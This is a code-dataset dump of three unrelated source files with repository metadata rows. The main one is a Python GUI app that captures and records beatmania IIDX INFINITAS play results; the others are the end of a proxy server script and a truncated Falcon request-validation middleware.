# Script entry point: run the server; exit quietly on Ctrl-C.
if __name__ == '__main__':
    try:
        main()
    except socket.error as e:
        # e.g. listen port already in use
        logging.error(e)
    except KeyboardInterrupt:
        sys.exit(0)
| hadidonk/hxsocks | hxsserver.py | hxsserver.py | py | 23,258 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "gevent.monkey.patch_all",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "gevent.monkey",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "gevent.version_info",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sys.... |
import keyboard
import time
import PySimpleGUI as sg
from threading import Thread,Event
from queue import Queue
from os.path import join,exists,pardir
import webbrowser
import logging
from urllib import request
from urllib.parse import quote
from setting import Setting
# Load user settings; `manage` mode enables verbose logging (and console echo
# elsewhere via log_debug).
setting = Setting()
if setting.manage:
    logging_level = logging.DEBUG
else:
    logging_level = logging.WARNING
# Log to log.txt, truncated on every launch (filemode='w').
logging.basicConfig(
    level=logging_level,
    filename='log.txt',
    filemode='w',
    format='%(asctime)s - %(name)s %(levelname)-7s %(message)s'
)
logger = logging.getLogger()
logger.debug('loaded main.py')
logger.debug('mode: manage')
from version import version
import gui.main as gui
from gui.setting import open_setting
from gui.export import open_export
from gui.general import get_imagevalue
from define import define
from resources import resource,play_sound_result,check_latest
from screenshot import Screenshot,open_screenimage
from recog import recog
from raw_image import save_raw
from storage import StorageAccessor
from record import NotebookRecent,NotebookMusic,rename_allfiles
from graph import create_graphimage,save_graphimage
from result import result_save,result_savefiltered,get_resultimage,get_filteredimage
from filter import filter as filter_result
from playdata import Recent
from windows import find_window,get_rect,openfolder_results,openfolder_filtereds,openfolder_graphs
# Maximum number of rows kept in the "recent results" table.
recent_maxcount = 100
# Polling intervals (seconds) for the capture thread's various states.
thread_time_wait_nonactive = 1   # game window not found / not active
thread_time_wait_loading = 30    # loading screen detected
thread_time_normal = 0.3         # normal polling
thread_time_result = 0.12        # result screen detected: poll faster
# Confirmation dialog text shown before uploading a title-misrecognition report.
upload_confirm_message = [
    '曲名の誤認識を通報しますか?',
    'リザルトから曲名を切り取った画像をクラウドにアップロードします。'
]
# Target game window identification (title + process executable name).
windowtitle = 'beatmania IIDX INFINITAS'
exename = 'bm2dx.exe'
# External URLs and tweet templates (&&name&& placeholders substituted in tweet()).
latest_url = 'https://github.com/kaktuswald/inf-notebook/releases/latest'
tweet_url = 'https://twitter.com/intent/tweet'
tweet_template_music = '&&music&&[&&play_mode&&&&D&&]&&update&&&&option&&'
tweet_template_hashtag = '#IIDX #infinitas573 #infnotebook'
class ThreadMain(Thread):
    """Background thread that watches for the game window, captures screens,
    and pushes detected result screens onto the GUI's queues.

    State flags (class-level defaults, mutated per instance):
      handle            -- game window handle (0 = not found)
      active            -- window found and sized like the game screen
      waiting           -- currently on the loading screen (slow polling)
      confirmed_result  -- result screen detected at least once
      confirmed_savable -- result confirmed savable, waiting to settle
      processed_result  -- current result already queued for processing
      screen_latest     -- last classified screen name
    """
    handle = 0
    active = False
    waiting = False
    confirmed_result = False
    confirmed_savable = False
    processed_result = False
    screen_latest = None

    def __init__(self, event_close, queues):
        """Store the shutdown event and queue dict, then start immediately."""
        self.event_close = event_close
        self.queues = queues
        Thread.__init__(self)
        self.start()

    def run(self):
        """Run routine() repeatedly until event_close is set, sleeping
        self.sleep_time between iterations (routine() adjusts the interval)."""
        self.sleep_time = thread_time_wait_nonactive
        self.queues['log'].put('start thread')
        while not self.event_close.wait(timeout=self.sleep_time):
            self.routine()

    def routine(self):
        """One polling step: locate/validate the game window, classify the
        current screen, and queue a result screen once it is stable."""
        if self.handle == 0:
            self.handle = find_window(windowtitle, exename)
            if self.handle == 0:
                return
            self.queues['log'].put(f'infinitas find')
            self.active = False
            screenshot.xy = None
        rect = get_rect(self.handle)
        # BUGFIX: check rect before reading its attributes (the original
        # computed width/height first and crashed when get_rect returned None)
        if rect is None or not (rect.right - rect.left) or not (rect.bottom - rect.top):
            self.queues['log'].put(f'infinitas lost')
            self.sleep_time = thread_time_wait_nonactive
            self.handle = 0
            self.active = False
            screenshot.xy = None
            return
        width = rect.right - rect.left
        height = rect.bottom - rect.top
        if width != define.width or height != define.height:
            # window exists but isn't at the expected resolution (minimized etc.)
            if self.active:
                self.queues['log'].put(f'infinitas deactivate')
                self.sleep_time = thread_time_wait_nonactive
                self.active = False
                screenshot.xy = None
            return
        if not self.active:
            self.active = True
            self.waiting = False
            self.queues['log'].put(f'infinitas activate')
            self.sleep_time = thread_time_normal
            screenshot.xy = (rect.left, rect.top)
        screen = screenshot.get_screen()
        if screen != self.screen_latest:
            self.screen_latest = screen
        if screen == 'loading':
            if not self.waiting:
                # entering the loading screen resets all result bookkeeping
                self.confirmed_result = False
                self.confirmed_savable = False
                self.processed_result = False
                self.waiting = True
                self.queues['log'].put('find loading: start waiting')
                self.sleep_time = thread_time_wait_loading
            return
        if self.waiting:
            self.waiting = False
            self.queues['log'].put('lost loading: end waiting')
            self.sleep_time = thread_time_normal
        shotted = False
        if display_screenshot_enable:
            screenshot.shot()
            shotted = True
            self.queues['display_image'].put(screenshot.get_image())
        if screen != 'result':
            self.confirmed_result = False
            self.confirmed_savable = False
            self.processed_result = False
            return
        if not self.confirmed_result:
            self.confirmed_result = True
            self.sleep_time = thread_time_result
        if self.processed_result:
            return
        if not shotted:
            screenshot.shot()
        if not recog.get_is_savable(screenshot.np_value):
            return
        if not self.confirmed_savable:
            # first savable frame: remember when we saw it and wait for it to settle
            self.confirmed_savable = True
            self.find_time = time.time()
            return
        if time.time() - self.find_time <= thread_time_normal*2-0.1:
            return
        resultscreen = screenshot.get_resultscreen()
        self.processed = True  # NOTE(review): looks unused elsewhere — kept for compatibility
        self.queues['result_screen'].put(resultscreen)
        self.sleep_time = thread_time_normal
        self.processed_result = True
class Selection():
    """Tracks which chart (mode/difficulty/music) and which result the GUI
    currently has selected, plus where that selection came from."""

    def __init__(self, play_mode, difficulty, music, notebook):
        """Remember the chart identity and its notebook; start unselected."""
        self.play_mode = play_mode
        self.difficulty = difficulty
        self.music = music
        self.notebook = notebook
        self.recent, self.filtered, self.graph = False, False, False
        self.timestamp = None

    def selection_recent(self, timestamp):
        """Mark the selection as coming from the recent-results table."""
        self.recent, self.filtered, self.graph = True, False, False
        self.timestamp = timestamp

    def selection_graph(self):
        """Switch to graph display; returns False when no music is known."""
        if self.music is None:
            return False
        self.recent, self.filtered, self.graph = False, False, True
        self.timestamp = None
        return True

    def selection_timestamp(self, timestamp):
        """Point the selection at a specific history timestamp."""
        self.recent, self.filtered, self.graph = False, False, False
        self.timestamp = timestamp

    def selection_filtered(self):
        """Mark the displayed image as the blurred (filtered) variant."""
        self.filtered, self.graph = True, False

    def get_targetrecordlist(self):
        """Return the notebook's record list for the selected mode/difficulty."""
        return self.notebook.get_recordlist(self.play_mode, self.difficulty)
def result_process(screen):
    """Process a captured result screen: recognize it, optionally upload it,
    save images, and record it into the recent and per-music notebooks.

    Args:
        screen (Screen): captured screen object from screenshot.py
    """
    result = recog.get_result(screen)
    if result is None:
        return
    resultimage = screen.original
    # upload for data collection when enabled, or when forced via the GUI toggle
    if setting.data_collection or window['force_upload'].get():
        if storage.upload_collection(result, resultimage, window['force_upload'].get()):
            timestamps_uploaded.append(result.timestamp)
    if setting.newrecord_only and not result.has_new_record():
        return
    if setting.play_sound:
        play_sound_result()
    images_result[result.timestamp] = resultimage
    saved = False
    if setting.autosave:
        save_result(result, resultimage)
        saved = True
    filtered = False
    if setting.autosave_filtered:
        save_filtered(
            resultimage,
            result.timestamp,
            result.informations.music,
            result.play_side,
            result.rival,
            result.details.graphtarget == 'rival'
        )
        filtered = True
    notebook_recent.append(result, saved, filtered)
    notebook_recent.save()
    music = result.informations.music
    if music is not None:
        # fetch or lazily create the per-music notebook
        if music in notebooks_music.keys():
            notebook = notebooks_music[music]
        else:
            notebook = NotebookMusic(music) if music is not None else None
            notebooks_music[music] = notebook
        # failed plays are only recorded when they still set a new record
        if not result.dead or result.has_new_record():
            notebook.insert(result)
            notebook.save()
    if not result.dead or result.has_new_record():
        recent.insert(result)
    insert_results(result)
def save_result(result, image):
    """Save the raw result image to disk once per timestamp.

    Shows an error dialog on failure; on success remembers the timestamp in
    timestamps_saved so repeated calls are no-ops.
    """
    if result.timestamp in timestamps_saved:
        return
    ret = None
    try:
        music = result.informations.music
        ret = result_save(image, music, result.timestamp, setting.imagesave_path, setting.savefilemusicname_right)
    except Exception as ex:
        logger.exception(ex)
        gui.error_message(u'保存の失敗', u'リザルトの保存に失敗しました。', ex)
        return
    if ret:
        timestamps_saved.append(result.timestamp)
        log_debug(f'save result: {ret}')
def save_filtered(resultimage, timestamp, music, play_side, loveletter, rivalname):
    """Blur rival information on a result image and save it to disk.

    Args:
        resultimage (Image): source PIL image
        timestamp (str): the result's timestamp
        music (str): music title
        play_side (str): '1P' or '2P'
        loveletter (bool): whether a rival challenge letter is visible
        rivalname (bool): whether the graph target shows a rival name

    On success the blurred image is cached in images_filtered[timestamp].
    """
    filteredimage = filter_result(resultimage, play_side, loveletter, rivalname)
    ret = None
    try:
        ret = result_savefiltered(filteredimage, music, timestamp, setting.imagesave_path, setting.savefilemusicname_right)
    except Exception as ex:
        logger.exception(ex)
        gui.error_message(u'保存の失敗', u'リザルトの保存に失敗しました。', ex)
        return
    if ret:
        images_filtered[timestamp] = filteredimage
        log_debug(f'save filtered result: {ret}')
def insert_recentnotebook_results():
    """Populate the GUI results table from the persisted recent notebook
    (called once at startup)."""
    for timestamp in notebook_recent.timestamps:
        target = notebook_recent.get_result(timestamp)
        playmode = target['play_mode']
        difficulty = target['difficulty']
        # newest first: each notebook entry is inserted at the top
        list_results.insert(0, [
            '☑' if target['saved'] else '',
            '☑' if target['filtered'] else '',
            timestamp,
            target['music'] if target['music'] is not None else '??????',
            f'{playmode}{difficulty[0]}' if playmode is not None and difficulty is not None else '???',
            '☑' if target['clear_type_new'] else '',
            '☑' if target['dj_level_new'] else '',
            '☑' if target['score_new'] else '',
            '☑' if target['miss_count_new'] else ''
        ])
    refresh_table()
def insert_results(result):
    """Insert a freshly recognized result at the top of the GUI results table,
    trim the table to recent_maxcount rows, and keep the row selection stable."""
    global table_selected_rows
    results_today[result.timestamp] = result
    play_mode = result.informations.play_mode
    difficulty = result.informations.difficulty
    music = result.informations.music
    list_results.insert(0, [
        '☑' if result.timestamp in timestamps_saved else '',
        '☑' if result.timestamp in images_filtered.keys() else '',
        result.timestamp,
        music if music is not None else '??????',
        f'{play_mode}{difficulty[0]}' if play_mode is not None and difficulty is not None else '???',
        '☑' if result.details.clear_type.new else '',
        '☑' if result.details.dj_level.new else '',
        '☑' if result.details.score.new else '',
        '☑' if result.details.miss_count.new else ''
    ])
    while len(list_results) > recent_maxcount:
        del list_results[-1]
    # a row was prepended, so every previously selected index shifts down by one
    table_selected_rows = [v + 1 for v in table_selected_rows]
    refresh_table(setting.display_result)
def update_resultflag(row_index, saved=False, filtered=False):
    """Set the saved/filtered checkmark columns on one results-table row."""
    row = list_results[row_index]
    if saved:
        row[0] = '☑'
    if filtered:
        row[1] = '☑'
def refresh_table(select_newest=False):
    """Push list_results into the GUI table, selecting either the newest row
    (select_newest=True) or the previously selected rows."""
    rows = [0] if select_newest else table_selected_rows
    window['table_results'].update(values=list_results, select_rows=rows)
def clear_tableselection():
    """Deselect every row in the results table.

    BUGFIX: declare table_selected_rows global; without it the assignment
    created a dead local and the module-level selection list (read by
    refresh_table and the event loop) kept its stale rows.
    """
    global table_selected_rows
    table_selected_rows = []
    window['table_results'].update(select_rows=table_selected_rows)
def active_screenshot():
    """Hotkey handler (alt+F10): capture the game window, save the raw image,
    and show it plus its file path in the GUI."""
    if not screenshot.shot():
        return
    image = screenshot.get_image()
    if image is not None:
        filepath = save_raw(image)
        log_debug(f'save screen: {filepath}')
        gui.display_image(get_imagevalue(image))
        # shown relative to the app directory
        window['screenshot_filepath'].update(join(pardir, filepath))
def log_debug(message):
    """Log at DEBUG level; also echo to stdout when running in manage mode."""
    logger.debug(message)
    if not setting.manage:
        return
    print(message)
def get_latest_version():
    """Follow the GitHub 'latest release' redirect and return the released
    version string without its leading 'v', or None if the tag is unexpected."""
    with request.urlopen(latest_url) as response:
        resolved_url = response.geturl()
    tag = resolved_url.split('/')[-1]
    print(f'released latest version: {tag}')
    if tag[0] != 'v':
        return None
    return tag.removeprefix('v')
def check_resource():
    """Download newer recognition resource files from storage if available and
    reload them; refreshes the GUI music table when the music table changes.
    Runs in a background thread at startup."""
    informations_filename = f'{define.informations_resourcename}.res'
    if check_latest(storage, informations_filename):
        resource.load_resource_informations()
    details_filename = f'{define.details_resourcename}.res'
    if check_latest(storage, details_filename):
        resource.load_resource_details()
    musictable_filename = f'{define.musictable_resourcename}.res'
    if check_latest(storage, musictable_filename):
        resource.load_resource_musictable()
        gui.update_musictable()
def select_result_recent():
    """Handle selecting a single row in the recent-results table.

    Builds a Selection for the row, displays its image (today's cache or
    from disk) and, when the music is known, syncs the search widgets and
    shows the record/history.  Returns the Selection, or None when zero or
    multiple rows are selected.
    """
    if len(table_selected_rows) == 0:
        return None
    # clear the music search list selection either way
    window['music_candidates'].update(set_to_index=[])
    if len(table_selected_rows) != 1:
        return None
    timestamp = list_results[table_selected_rows[0]][2]
    target = notebook_recent.get_result(timestamp)
    if target['music'] is not None:
        # fetch or lazily create the per-music notebook
        if target['music'] in notebooks_music.keys():
            notebook = notebooks_music[target['music']]
        else:
            notebook = NotebookMusic(target['music'])
            notebooks_music[target['music']] = notebook
    else:
        notebook = None
    ret = Selection(
        target['play_mode'],
        target['difficulty'],
        target['music'],
        notebook
    )
    ret.selection_recent(timestamp)
    if timestamp in results_today.keys():
        display_today(ret)
    else:
        display_history(ret)
    if ret.notebook is not None:
        # sync the search widgets to the selected chart
        if ret.play_mode == 'SP':
            window['play_mode_sp'].update(True)
        if ret.play_mode == 'DP':
            window['play_mode_dp'].update(True)
        window['difficulty'].update(ret.difficulty)
        window['search_music'].update(target['music'])
        targetrecordlist = ret.get_targetrecordlist()
        gui.display_record(targetrecordlist)
        gui.display_historyresult(targetrecordlist, timestamp)
    else:
        gui.display_record(None)
    return ret
def select_music_search():
    """Handle selecting a music from the search candidate list.

    Requires exactly one candidate plus a play mode and difficulty; shows the
    record and its graph.  Returns the new Selection, or None when the
    selection is incomplete or the chart has no records.
    """
    if len(values['music_candidates']) != 1:
        return None
    play_mode = None
    if values['play_mode_sp']:
        play_mode = 'SP'
    if values['play_mode_dp']:
        play_mode = 'DP'
    if play_mode is None:
        return None
    difficulty = values['difficulty']
    if difficulty == '':
        return None
    music = values['music_candidates'][0]
    # searching by music supersedes any table row selection
    clear_tableselection()
    if music in notebooks_music.keys():
        notebook = notebooks_music[music]
    else:
        notebook = NotebookMusic(music)
        notebooks_music[music] = notebook
    targetrecordlist = notebook.get_recordlist(play_mode, difficulty)
    if targetrecordlist is None:
        gui.display_record(None)
        gui.display_image(None)
        return None
    ret = Selection(play_mode, difficulty, music, notebook)
    gui.display_record(targetrecordlist)
    create_graph(ret, targetrecordlist)
    return ret
def select_history():
    """Handle selecting one entry in the play-history list: point the current
    Selection at that timestamp and display the matching result image."""
    if len(values['history']) != 1:
        return
    clear_tableselection()
    timestamp = values['history'][0]
    selection.selection_timestamp(timestamp)
    gui.display_historyresult(selection.get_targetrecordlist(), timestamp)
    if timestamp in results_today.keys():
        display_today(selection)
    else:
        display_history(selection)
def load_resultimages(timestamp, music, recent=False):
    """Load the saved result image (and its blurred variant) for *timestamp*
    from disk into the in-memory caches.

    For recent-notebook entries (recent=True) a missing blurred file is only
    cached when no original exists either, so it can still be generated later.
    """
    original = get_resultimage(music, timestamp, setting.imagesave_path)
    images_result[timestamp] = original
    if original is not None:
        timestamps_saved.append(timestamp)
    blurred = get_filteredimage(music, timestamp, setting.imagesave_path)
    if not recent or original is None or blurred is not None:
        images_filtered[timestamp] = blurred
def display_today(selection):
    """Show the result image for a result captured during this session,
    converting it to a GUI image value once and caching the conversion."""
    ts = selection.timestamp
    if ts in imagevalues_result:
        imagevalue = imagevalues_result[ts]
    else:
        imagevalue = get_imagevalue(images_result[ts])
        imagevalues_result[ts] = imagevalue
    gui.display_image(imagevalue, result=True)
def display_history(selection):
    """Show a past result's image, loading from disk on first access.

    Prefers the original saved image; falls back to the blurred variant and,
    when only that exists, marks the selection as filtered.
    """
    if not selection.timestamp in images_result.keys():
        load_resultimages(selection.timestamp, selection.music, selection.timestamp in notebook_recent.timestamps)
    if selection.timestamp in imagevalues_result.keys():
        imagevalue_result = imagevalues_result[selection.timestamp]
    else:
        imagevalue_result = get_imagevalue(images_result[selection.timestamp]) if selection.timestamp in images_result.keys() and images_result[selection.timestamp] is not None else None
        imagevalues_result[selection.timestamp] = imagevalue_result
    if imagevalue_result is not None:
        gui.display_image(imagevalue_result, result=True)
    else:
        # no original image: try the blurred one
        if selection.timestamp in imagevalues_filtered.keys():
            imagevalue_filtered = imagevalues_filtered[selection.timestamp]
        else:
            imagevalue_filtered = get_imagevalue(images_filtered[selection.timestamp]) if selection.timestamp in images_filtered.keys() and images_filtered[selection.timestamp] is not None else None
            imagevalues_filtered[selection.timestamp] = imagevalue_filtered
        gui.display_image(imagevalue_filtered, result=True)
        if imagevalue_filtered is not None:
            selection.selection_filtered()
def save():
    """'Save' button handler.

    Recent-table selection: save every selected today's result that is not
    yet on disk and update its table flag.  Graph selection: save the graph
    image for the selected music.
    """
    if selection.recent:
        for row_index in table_selected_rows:
            timestamp = list_results[row_index][2]
            if timestamp in results_today.keys() and not timestamp in timestamps_saved:
                save_result(results_today[timestamp], images_result[timestamp])
                notebook_recent.get_result(timestamp)['saved'] = True
                update_resultflag(row_index, saved=True)
        notebook_recent.save()
        refresh_table()
    if selection.graph:
        save_graphimage(selection.music, images_graph[selection.music], setting.imagesave_path, setting.savefilemusicname_right)
# NOTE(review): this function shadows the builtin `filter`; renaming would be
# safer but it is referenced as an event handler, so the name is kept.
def filter():
    """Blur the rival area of result images and display the blurred image.

    When selecting from the recent-results table:
        apply blurring to every selected result; a non-today result can only
        be processed when its image was saved to a file.
    When selecting via the music search:
        if the result is also in the recent notebook it cannot be processed
        here (the table row index is unknown); only check whether a blurred
        image already exists and display it if so.
    """
    if selection.recent:
        updated = False
        for row_index in table_selected_rows:
            timestamp = list_results[row_index][2]
            target = notebook_recent.get_result(timestamp)
            if not timestamp in images_result.keys():
                load_resultimages(timestamp, target['music'], True)
            if images_result[timestamp] is not None and not timestamp in images_filtered.keys():
                save_filtered(
                    images_result[timestamp],
                    timestamp,
                    target['music'],
                    target['play_side'],
                    target['has_loveletter'],
                    target['has_graphtargetname']
                )
                target['filtered'] = True
                update_resultflag(row_index, filtered=True)
                updated = True
        if updated:
            notebook_recent.save()
            refresh_table()
    else:
        if not selection.timestamp in images_result.keys() and not selection.timestamp in notebook_recent.timestamps:
            load_resultimages(selection.timestamp, selection.music)
        if selection.timestamp in imagevalues_filtered.keys():
            imagevalue = imagevalues_filtered[selection.timestamp]
        else:
            filteredimage = images_filtered[selection.timestamp] if selection.timestamp in images_filtered.keys() else None
            imagevalue = get_imagevalue(filteredimage) if filteredimage is not None else None
            if imagevalue is not None:
                imagevalues_filtered[selection.timestamp] = imagevalue
        if imagevalue is not None:
            gui.display_image(imagevalue, result=True)
            selection.selection_filtered()
def upload():
    """Report title misrecognitions: after user confirmation, force-upload the
    selected today's results that were not already uploaded."""
    if not selection.recent:
        return
    if not gui.question('確認', upload_confirm_message):
        return
    for row_index in table_selected_rows:
        timestamp = list_results[row_index][2]
        if timestamp not in results_today.keys():
            continue  # only results captured this session have images in memory
        if timestamp in timestamps_uploaded:
            continue  # already reported
        storage.upload_collection(results_today[timestamp], images_result[timestamp], True)
        timestamps_uploaded.append(timestamp)
def _open_folder(opener):
    """Open an explorer window via opener(imagesave_path); show an error
    dialog on failure (the windows helpers return the exception, not raise)."""
    ret = opener(setting.imagesave_path)
    if ret is not None:
        logger.exception(ret)
        gui.error_message(u'失敗', u'フォルダを開くのに失敗しました。', ret)

def open_folder_results():
    """Open the folder containing saved result images."""
    _open_folder(openfolder_results)

def open_folder_filtereds():
    """Open the folder containing blurred (filtered) result images."""
    _open_folder(openfolder_filtereds)

def open_folder_graphs():
    """Open the folder containing saved graph images."""
    _open_folder(openfolder_graphs)
def tweet():
    """Open the browser on a pre-filled tweet for the selected result(s).

    With table rows selected, one template line per result (oldest first);
    otherwise, with one search candidate selected, a single line without
    update/option info.  Placeholders (&&music&& etc.) come from
    tweet_template_music.
    """
    if len(values['table_results']) > 0:
        musics_text = []
        # reversed so the oldest selected result comes first in the tweet
        for index in reversed(values['table_results']):
            result = notebook_recent.get_result(list_results[index][2])
            music = result['music']
            music = music if music is not None else '??????'
            text = tweet_template_music
            text = text.replace('&&play_mode&&', result['play_mode'])
            text = text.replace('&&D&&', result['difficulty'][0])
            text = text.replace('&&music&&', music)
            # update text priority: clear type / DJ level > score > miss count
            if result['update_clear_type'] is not None or result['update_dj_level'] is not None:
                text = text.replace('&&update&&', ' '.join(v for v in [result['update_clear_type'], result['update_dj_level']] if v is not None))
            else:
                if result['update_score'] is not None:
                    text = text.replace('&&update&&', f"自己ベスト+{result['update_score']}")
                else:
                    if result['update_miss_count'] is not None:
                        text = text.replace('&&update&&', f"ミスカウント{result['update_miss_count']}")
                    else:
                        text = text.replace('&&update&&', '')
            if result['option'] is not None:
                if result['option'] == '':
                    # empty option string means the chart was played without options
                    text = text.replace('&&option&&', '(正規)')
                else:
                    text = text.replace('&&option&&', f"({result['option']})")
            else:
                text = text.replace('&&option&&', '')
            musics_text.append(text)
        music_text = '\n'.join(musics_text)
    else:
        if len(values['music_candidates']) == 1:
            music_text = tweet_template_music
            music_text = music_text.replace('&&play_mode&&', selection.play_mode)
            if selection.music is not None:
                music_text = music_text.replace('&&music&&', selection.music)
            else:
                music_text = music_text.replace('&&music&&', '?????')
            music_text = music_text.replace('&&D&&', selection.difficulty[0])
            music_text = music_text.replace('&&update&&', '')
            music_text = music_text.replace('&&option&&', '')
        else:
            music_text = ''
    text = quote('\n'.join((music_text, tweet_template_hashtag)))
    url = f'{tweet_url}?text={text}'
    webbrowser.open(url)
def delete_record():
    """Delete the whole notebook of the selected music, drop its cache entry,
    and reset the record/image display."""
    if selection is None:
        return
    music = selection.music
    if music in notebooks_music.keys():
        del notebooks_music[music]
    selection.notebook.delete()
    gui.search_music_candidates()
    gui.display_record(None)
    gui.display_image(None)
def delete_targetrecord():
    """Delete only the selected timestamp's entry from the notebook's history
    and refresh the record display."""
    if selection is None or selection.timestamp is None:
        return
    selection.notebook.delete_history(
        selection.play_mode,
        selection.difficulty,
        selection.timestamp
    )
    gui.display_record(selection.get_targetrecordlist())
    gui.display_image(None)
def create_graph(selection, targetrecord):
    """Render the score-history graph for the selected chart, cache it,
    display it, and mark the selection as graph mode."""
    image = create_graphimage(selection.play_mode, selection.difficulty, selection.music, targetrecord)
    if image is None:
        return
    images_graph[selection.music] = image
    gui.display_image(get_imagevalue(image), graph=True)
    selection.selection_graph()
def rename_all_musicnotebooks():
    """Rename every music notebook file to the current naming scheme."""
    # The resource data is needed to enumerate the known musics; skip otherwise.
    if resource.informations is not None:
        rename_allfiles(resource.musictable['musics'].keys())
if __name__ == '__main__':
    # Global hotkey: alt+F10 captures the play screen at any time.
    keyboard.add_hotkey('alt+F10', active_screenshot)
    window = gui.generate_window(setting, version)
    # Mutable application state shared with the handler functions above.
    display_screenshot_enable = False
    screenshot = Screenshot()
    notebook_recent = NotebookRecent(recent_maxcount)
    notebooks_music = {}
    results_today = {}
    timestamps_saved = []
    timestamps_uploaded = []
    images_result = {}
    images_filtered = {}
    imagevalues_result = {}
    imagevalues_filtered = {}
    images_graph = {}
    selection = None
    recent = Recent()
    list_results = []
    table_selected_rows = []
    # Queues used by the worker thread to hand data back to the GUI thread.
    queue_log = Queue()
    queue_display_image = Queue()
    queue_result_screen = Queue()
    storage = StorageAccessor()
    event_close = Event()
    thread = ThreadMain(
        event_close,
        queues = {
            'log': queue_log,
            'display_image': queue_display_image,
            'result_screen': queue_result_screen
        }
    )
    # Debounce deadline for the incremental music search box (None = idle).
    music_search_time = None
    if not setting.has_key('data_collection'):
        # First run: ask the user whether they consent to data collection.
        setting.data_collection = gui.collection_request('resources/annotation.png')
        setting.save()
    if setting.data_collection:
        window['button_upload'].update(visible=True)
    if version != '0.0.0.0' and get_latest_version() != version:
        gui.find_latest_version(latest_url)
    if not setting.ignore_download:
        Thread(target=check_resource).start()
    # Workaround for a bug present in version 0.7.0.1 and earlier.
    rename_all_musicnotebooks()
    insert_recentnotebook_results()
    while True:
        # Poll the GUI; 'timeout' events drive the periodic background work below.
        event, values = window.read(timeout=50, timeout_key='timeout')
        try:
            if event in (sg.WIN_CLOSED, sg.WINDOW_CLOSE_ATTEMPTED_EVENT):
                if not thread is None:
                    # Signal the worker thread and wait for it before quitting.
                    event_close.set()
                    thread.join()
                log_debug(f'end')
                break
            # Checkbox toggles: mirror the GUI state into the settings object.
            if event == 'check_display_screenshot':
                display_screenshot_enable = values['check_display_screenshot']
            if event == 'check_display_result':
                setting.display_result = values['check_display_result']
            if event == 'check_newrecord_only':
                setting.newrecord_only = values['check_newrecord_only']
            if event == 'check_autosave':
                setting.autosave = values['check_autosave']
            if event == 'check_autosave_filtered':
                setting.autosave_filtered = values['check_autosave_filtered']
            if event == 'check_display_music':
                setting.display_music = values['check_display_music']
                gui.switch_table(setting.display_music)
            if event == 'check_play_sound':
                setting.play_sound = values['check_play_sound']
            if event == 'check_savefilemusicname_right':
                setting.savefilemusicname_right = values['check_savefilemusicname_right']
            if event == 'text_file_path':
                # A screenshot file was selected/dropped: load and process it.
                if exists(values['text_file_path']):
                    screen = open_screenimage(values['text_file_path'])
                    gui.display_image(get_imagevalue(screen.original))
                    if recog.get_is_savable(screen.np_value):
                        result_process(screen)
            # Button events delegate to the module-level handler functions.
            if event == 'button_setting':
                open_setting(setting)
                window['button_upload'].update(visible=setting.data_collection)
            if event == 'button_save':
                save()
            if event == 'button_filter':
                filter()
            if event == 'button_open_folder_results':
                open_folder_results()
            if event == 'button_open_folder_filtereds':
                open_folder_filtereds()
            if event == 'button_open_folder_graphs':
                open_folder_graphs()
            if event == 'button_tweet':
                tweet()
            if event == 'button_export':
                open_export(recent)
            if event == 'button_upload':
                upload()
            if event == 'table_results':
                # Only react to an actual change of the selected rows.
                if values['table_results'] != table_selected_rows:
                    table_selected_rows = values['table_results']
                    selection_result = select_result_recent()
                    if selection_result is not None:
                        selection = selection_result
                        if selection.music is not None:
                            window['music_candidates'].update([selection.music], set_to_index=[0])
                        else:
                            window['music_candidates'].update(set_to_index=[])
            if event == 'button_graph':
                if selection is not None and selection.music is not None:
                    create_graph(selection, selection.get_targetrecordlist())
            if event == 'category_versions':
                gui.search_music_candidates()
            if event == 'search_music':
                # Debounce: run the search one second after the last keystroke.
                music_search_time = time.time() + 1
            if event in ['play_mode_sp', 'play_mode_dp', 'difficulty', 'music_candidates']:
                selection_result = select_music_search()
                if selection_result is not None:
                    selection = selection_result
            if event == '選択した曲の記録を削除する':
                delete_record()
                selection = None
            if event == 'history':
                select_history()
            if event == '選択したリザルトの記録を削除する':
                delete_targetrecord()
            if event == 'button_best_switch':
                gui.switch_best_display()
            if event == 'timeout':
                # Periodic housekeeping: status indicators, deferred search,
                # and draining the worker-thread queues.
                if not window['positioned'].visible and thread.handle:
                    window['positioned'].update(visible=True)
                if window['positioned'].visible and not thread.handle:
                    window['positioned'].update(visible=False)
                if not window['captureenable'].visible and screenshot.xy:
                    window['captureenable'].update(visible=True)
                if window['captureenable'].visible and not screenshot.xy:
                    window['captureenable'].update(visible=False)
                if music_search_time is not None and time.time() > music_search_time:
                    music_search_time = None
                    gui.search_music_candidates()
                if not queue_log.empty():
                    log_debug(queue_log.get_nowait())
                if not queue_display_image.empty():
                    # A new screen image arrived from the worker: reset selection.
                    clear_tableselection()
                    window['music_candidates'].update(set_to_index=[])
                    selection = None
                    gui.display_image(get_imagevalue(queue_display_image.get_nowait()))
                if not queue_result_screen.empty():
                    result_process(queue_result_screen.get_nowait())
        except Exception as ex:
            # Keep the GUI alive on handler errors; log for diagnosis.
            log_debug(ex)
    window.close()
    del screenshot
| kaktuswald/inf-notebook | main.pyw | main.pyw | pyw | 34,382 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "setting.Setting",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "setting.manage",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "logging.DEBUG",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "logging.WARNIN... |
32402600311 | import json
from falcon.status_codes import HTTP_404, HTTP_400
from marshmallow import ValidationError
from utils.HTTPError import HTTPError
class Serializer:
    """
    This middleware gives us a possibility to validate data from request body.
    It also allows to set a separate schema (validator) for every HTTP method.
    At the end, it sets serializer data in context so we can read the data in API
    endpoint (if needed). If the data is not correct, API returns HTTP 400 error
    with validation message returned by marshmallow.
    """

    def process_resource(self, req, _resp, resource, _params):
        """Validate the JSON request body with the resource's per-method schema.

        Stores the validated payload in ``req.context["serializer"]``.
        Raises HTTP 400 for malformed JSON or failed validation, and HTTP 404
        when the resource declares no serializer for the request method.
        """
        try:
            body = json.load(req.bounded_stream)
        except ValueError:
            # json.JSONDecodeError (a ValueError subclass): a malformed body is
            # a client error, not a 500 from an unhandled exception.
            raise HTTPError(error="Bad Request", status=HTTP_400)
        try:
            serializer = resource.serializers[req.method.lower()]
        except (AttributeError, IndexError, KeyError):
            # No serializers mapping / no schema for this method.
            raise HTTPError(status=HTTP_404)
        try:
            req.context["serializer"] = serializer().load(data=body)
